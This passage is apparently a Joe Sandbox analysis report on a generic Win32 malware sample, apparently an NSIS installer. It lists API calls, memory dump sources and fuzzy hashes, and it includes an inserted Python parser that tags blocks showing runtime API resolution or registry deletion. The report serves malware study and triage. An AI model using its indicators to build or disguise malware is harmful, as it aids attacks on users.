                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 589700163-1756098048
                                                                        • Opcode ID: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
                                                                        • Instruction ID: f1a46c244338e9c327de57877a99ef2f1f2ce6c7380876dc27bda46ebf0462ee
                                                                        • Opcode Fuzzy Hash: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
                                                                        • Instruction Fuzzy Hash: 671134918047903DFB3216386C04B776FC94F9B760F5A007BE4C2722CAC63C5CA6826D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetWindowLongA.USER32(?,000000EB), ref: 00404358
                                                                        • GetSysColor.USER32(00000000), ref: 00404396
                                                                        • SetTextColor.GDI32(?,00000000), ref: 004043A2
                                                                        • SetBkMode.GDI32(?,?), ref: 004043AE
                                                                        • GetSysColor.USER32(?), ref: 004043C1
                                                                        • SetBkColor.GDI32(?,?), ref: 004043D1
                                                                        • DeleteObject.GDI32(?), ref: 004043EB
                                                                        • CreateBrushIndirect.GDI32(?), ref: 004043F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        • Opcode ID: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
                                                                        • Instruction ID: d64fbe2596ca860a271eaf52242e9b3e10407c8dba4713a28e38d7cfcaef20bb
                                                                        • Opcode Fuzzy Hash: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
                                                                        • Instruction Fuzzy Hash: 822174716007049FCB30DF68D908B5BBBF8AF81710B04892EED96A26E1C734D915CB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,6EAC10DC), ref: 6EAC17CC
                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,6EAC10DC), ref: 6EAC17DA
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 6EAC17F9
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 6EAC1822
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1379662989.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1379640466.000000006EAC0000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000000.00000002.1379684801.000000006EAC2000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000000.00000002.1379750126.000000006EAC3000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000000.00000002.1379781257.000000006EAC4000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6eac0000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$CurrentHandleModuleProcess
                                                                        • String ID: IsWow64Process2$KERNEL32
                                                                        • API String ID: 977827838-1019154776
                                                                        • Opcode ID: dc7d2f6f335aecdbd4301cffdcb45171354d2bc1e1d87e93df7588b8cf649f67
                                                                        • Instruction ID: 623ec8d0a9d1461445b8d07cec45f7e86c6e6eae0b63de795314dc8983b88943
                                                                        • Opcode Fuzzy Hash: dc7d2f6f335aecdbd4301cffdcb45171354d2bc1e1d87e93df7588b8cf649f67
                                                                        • Instruction Fuzzy Hash: 1B015272E0060AAAEF01EBE4CC49ABF7B7CDF05640F4480A1A911E7040EB74DD4AC775
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
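
                                                                        The function blocks in this listing share one fixed layout: API lines of the form `Name.MODULE(args), ref: ADDR` (optionally prefixed with `Part of subcall function ADDR:`), a `Source File ..., Offset: BASE` line, and `API ID` / `String ID` fields joined with `$`. As an added example, not part of the Joe Sandbox report or its tooling, the parser below reads that layout and applies two triage rules a practitioner wants when skimming hundreds of such blocks: flag blocks that resolve APIs by name at runtime (the `GetProcAddress` block above whose string table carries `IsWow64Process2` and `KERNEL32`) and flag blocks that delete registry keys. The sample text is constructed from lines of this report and trimmed; the tag names, the `Block` fields and the "all-uppercase string is a module name" heuristic are the example's own assumptions, not the sandbox's semantics.

```python
"""Parse Joe Sandbox function-listing blocks and tag the ones worth a closer look.

Added example for this report page; the layout it parses is the 'APIs' /
'Memory Dump Source' / 'Similarity' block shown in the listing.  The tag
names and heuristics below are assumptions made for illustration.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: two blocks copied in the shape of the listing and trimmed
# to the lines the parser reads.  The subcall line in the second block is
# borrowed from another block of the report purely to exercise that prefix.
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,6EAC10DC), ref: 6EAC17CC
• GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,6EAC10DC), ref: 6EAC17DA
• GetProcAddress.KERNEL32(00000000,?), ref: 6EAC17F9
• GetProcAddress.KERNEL32(00000000,?), ref: 6EAC1822
Strings
Memory Dump Source
• Source File: 00000000.00000002.1379662989.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
Similarity
• API ID: AddressProc$CurrentHandleModuleProcess
• String ID: IsWow64Process2$KERNEL32
• API String ID: 977827838-1019154776
Uniqueness Score: -1.00%

APIs
• RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D8F
• RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402DDB
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402DE4
• RegDeleteKeyA.ADVAPI32(?,?), ref: 00402DFB
  • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,[Rename]), ref: 00405D5F
• wsprintfA.USER32 ref: 00402E7B
Memory Dump Source
• Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseEnum$DeleteValue
• String ID:
• API String ID: 1354259210-0
Uniqueness Score: -1.00%
"""

# One API line.  The argument list is optional (wsprintfA has none) and may
# contain commas, brackets and quotes, so it is matched greedily up to the
# last ')' that precedes ', ref:'.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
SRC_RE = re.compile(r"Source File: (?P<file>\S+), Offset: (?P<base>[0-9A-F]+)")

ApiCall = Tuple[str, str, str, str, Optional[str]]  # api, module, args, ref, subcall


@dataclass
class Block:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)  # from 'String ID', split on '$'
    base: str = ""                                    # image base from 'Offset:'
    api_string_id: str = ""


def parse_blocks(text: str) -> List[Block]:
    """Split the listing into blocks; 'Uniqueness Score' closes each block."""
    blocks, cur = [], Block()
    for raw in text.splitlines():
        line = raw.strip()  # subcall lines are indented one level deeper
        api = API_RE.match(line)
        src = SRC_RE.search(line)
        if api:
            cur.apis.append((api["api"], api["mod"], api["args"] or "", api["ref"], api["sub"]))
        elif src:
            cur.base = src["base"]
        elif line.startswith("• String ID:"):
            val = line[len("• String ID:"):].strip()
            cur.strings = val.split("$") if val else []
        elif line.startswith("• API String ID:"):
            cur.api_string_id = line.split(":", 1)[1].strip()
        elif line.startswith("Uniqueness Score"):
            blocks.append(cur)
            cur = Block()
    return blocks


def triage(block: Block) -> List[Tuple[str, List[str]]]:
    """Assumed triage rules: runtime API resolution and registry deletion."""
    tags = []
    names = {call[0] for call in block.apis}
    if "GetProcAddress" in names:
        # Heuristic (assumption): module names in these string tables are all
        # uppercase (KERNEL32); anything else is a function name being resolved.
        resolved = [s for s in block.strings if s and s.upper() != s]
        tags.append(("dynamic-api-resolution", resolved))
    deletes = sorted(n for n in names if n.startswith("RegDelete"))
    if deletes:
        tags.append(("registry-deletion", deletes))
    return tags


if __name__ == "__main__":
    for b in parse_blocks(SAMPLE):
        print(b.base, len(b.apis), "APIs", triage(b))
```

                                                                        Run it against a saved copy of the listing instead of SAMPLE to get one line per function block with its image base, API count and tags; blocks from a base other than the main image (here 6EAC0000, a loaded DLL) are easy to sort out by the `base` field.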

                                                                        APIs
                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C42
                                                                        • GetMessagePos.USER32 ref: 00404C4A
                                                                        • ScreenToClient.USER32(?,?), ref: 00404C64
                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C76
                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404C9C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                        • Instruction ID: 6a0354fd0873e2a66e4e803e7b6bfaf8a717de4a4c12bc6328b4bc3a065c57a7
                                                                        • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                        • Instruction Fuzzy Hash: DB015E71900219BAEB00DBA4DD85BFFBBBCAF55B25F10012BBB40B61D0C7B499018BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E40
                                                                        • MulDiv.KERNEL32(0008927E,00000064,?), ref: 00402E6B
                                                                        • wsprintfA.USER32 ref: 00402E7B
                                                                        • SetWindowTextA.USER32(?,?), ref: 00402E8B
                                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E9D
                                                                        Strings
                                                                        • verifying installer: %d%%, xrefs: 00402E75
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                        • String ID: verifying installer: %d%%
                                                                        • API String ID: 1451636040-82062127
                                                                        • Opcode ID: eba7e3e6a7a9e8d042f95bb146de847513e93a7983d8e04ff54a2d99dc20c472
                                                                        • Instruction ID: 3badc6b09a90e5cd1525348ef4ea74cecb255546bda3c46a06932aa9f71b5be3
                                                                        • Opcode Fuzzy Hash: eba7e3e6a7a9e8d042f95bb146de847513e93a7983d8e04ff54a2d99dc20c472
                                                                        • Instruction Fuzzy Hash: 61016270640209FBEF209F60DE09EEE3769EB04344F008039FA06B51D0DBB89955CF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(Drivelingly Setup: Installing,Drivelingly Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A38,000000DF,00000000,00000400,?), ref: 00404BBB
                                                                        • wsprintfA.USER32 ref: 00404BC3
                                                                        • SetDlgItemTextA.USER32(?,Drivelingly Setup: Installing), ref: 00404BD6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s$Drivelingly Setup: Installing
                                                                        • API String ID: 3540041739-3306535467
                                                                        • Opcode ID: f9a1414fa03c0c3c7f8caedbf18c99db995dc974198a74691eea8222610f4172
                                                                        • Instruction ID: b26deece5e1670680048ef5420f4dfbdf719bfc276585dbcb3e162ecceacc2fc
                                                                        • Opcode Fuzzy Hash: f9a1414fa03c0c3c7f8caedbf18c99db995dc974198a74691eea8222610f4172
                                                                        • Instruction Fuzzy Hash: 8311B773A0412867DB00756D9C41FAF3698DB85374F25027BFA26F31D1E979DC1282AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D8F
                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402DDB
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DE4
                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402DFB
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E06
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseEnum$DeleteValue
                                                                        • String ID:
                                                                        • API String ID: 1354259210-0
                                                                        • Opcode ID: bcf30ede795412a278e614d35869279e6b92a28af07cf09550cc0822dd29a43e
                                                                        • Instruction ID: d48e4a71bfa48a15fd7248f9ae3dc224302ba9e6f67c9eaa91d5645e55e2e307
                                                                        • Opcode Fuzzy Hash: bcf30ede795412a278e614d35869279e6b92a28af07cf09550cc0822dd29a43e
                                                                        • Instruction Fuzzy Hash: D9213771500108BADF129F90CE89EEB7B7DEF44344F10047AFA15B11A0D7B49EA4AAA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                                        • GetClientRect.USER32(?,?), ref: 00401DCC
                                                                        • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                                        • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                                        • DeleteObject.GDI32(00000000), ref: 00401E20
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: aac179cc4a1ea37f398950429777a32d29ab910b0ca69bec431bc59fb76cd7ad
                                                                        • Instruction ID: 4973ce5daa8367ce9871db5c73950c0598185a6d8b35e77b8380d9c424f967d4
                                                                        • Opcode Fuzzy Hash: aac179cc4a1ea37f398950429777a32d29ab910b0ca69bec431bc59fb76cd7ad
                                                                        • Instruction Fuzzy Hash: E3213B72E00109AFDF15DFA4DD85AAEBBB5EB48300F24407EF901F62A0DB789941DB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?,00000002,00000000,774E2D70,?,?,?,?,6EAC147C,00000002,?), ref: 6EAC185A
                                                                        • OemToCharBuffA.USER32(?,?,00000000), ref: 6EAC1863
                                                                        • SendMessageA.USER32(00001004,00000000,00000000,00000002), ref: 6EAC187C
                                                                        • SendMessageA.USER32(00001007,00000000,?), ref: 6EAC18A1
                                                                        • SendMessageA.USER32(00001013,?,00000000), ref: 6EAC18B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1379662989.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1379640466.000000006EAC0000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000000.00000002.1379684801.000000006EAC2000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000000.00000002.1379750126.000000006EAC3000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000000.00000002.1379781257.000000006EAC4000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6eac0000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$BuffCharlstrlen
                                                                        • String ID:
                                                                        • API String ID: 2682914888-0
                                                                        • Opcode ID: 509b76061d157da8216bb5b800e007bc7e5fb8ddc104aa1f4244788c40bbaf22
                                                                        • Instruction ID: 087f947681cf6d8f1f6781e7fff8b228e22e837af5a254ca3b6b505ef4ca4a14
                                                                        • Opcode Fuzzy Hash: 509b76061d157da8216bb5b800e007bc7e5fb8ddc104aa1f4244788c40bbaf22
                                                                        • Instruction Fuzzy Hash: 3B011A71900608AADF129FA6CD88CEABABCFB8EB55F118156E641B6140C6719D49CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00401E38
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                                        • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                        • String ID:
                                                                        • API String ID: 3808545654-0
                                                                        • Opcode ID: 7f4e46d46451b2de0eb6c05362a6388cf206f8a272ad05d839840d7a4d7908df
                                                                        • Instruction ID: 7d8b70fc9580f7c0a3656fe434d2777149f8876c9caaa3587920b0b4353cf884
                                                                        • Opcode Fuzzy Hash: 7f4e46d46451b2de0eb6c05362a6388cf206f8a272ad05d839840d7a4d7908df
                                                                        • Instruction Fuzzy Hash: 04019E72504240AFE7007BB0AF4AA9A7FF8EB55305F10847DF281B61F2CB7804888B6C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 00405BEF
                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 00405BF8
                                                                        • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405C09
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 2659869361-2145255484
                                                                        • Opcode ID: 78cba1d5cb2474798914f87c9b537ab1510ee16986e2efd06177e80df85e38b2
                                                                        • Instruction ID: 3e3e415651ec8bc6573efeb1b95b99caa1af1f852236f091574545f75c3ac81b
                                                                        • Opcode Fuzzy Hash: 78cba1d5cb2474798914f87c9b537ab1510ee16986e2efd06177e80df85e38b2
                                                                        • Instruction Fuzzy Hash: 15D02362609634BBE20137154D05EDF194C8F0335070504BBF100B31A1C77C4C1147FD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • DestroyWindow.USER32(?,00000000,00403086,00000001,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402EBB
                                                                        • GetTickCount.KERNEL32 ref: 00402ED9
                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402E25,00000000), ref: 00402EF6
                                                                        • ShowWindow.USER32(00000000,00000005,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402F04
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
